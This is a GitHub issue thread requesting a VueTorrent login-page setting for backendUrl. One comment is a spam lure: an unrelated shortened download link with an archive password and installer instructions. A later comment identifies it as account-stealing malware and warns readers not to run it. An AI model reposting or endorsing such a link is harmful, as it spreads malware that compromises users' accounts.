### ISSUE TITLE
[Feature Request]: Add a feature to set backendUrl on the login page

### ISSUE THREAD

**Issue by yhsrzbg** [VueTorrent/VueTorrent#1877]
### Description

I have set up VueTorrent to run independently on Nginx and deployed the `vuetorrent-backend` using Docker. However, I encountered an issue on the login page. Setting the `backendUrl` requires logging in, but the backend API for login cannot be configured.

### Describe the solution you'd like

Add a feature to set backendUrl on the login page

### Complementary informations

- [ ] Is this feature already implemented in the default WebUI?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by yhsrzbg** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

link is not accessible.

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere. 

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by yhsrzbg** [comment]
> Do **NOT** run it. **不要**运行它。
> 
> It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere.如果执行，恶意软件会窃取您的帐户，以进一步传播相同的垃圾邮件到其他地方。
> 
> There are a lot of comments like that有很多这样的评论
> 
> https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc
> 
> (and this is how I found this issue)（这就是我发现这个问题的原因）

ty
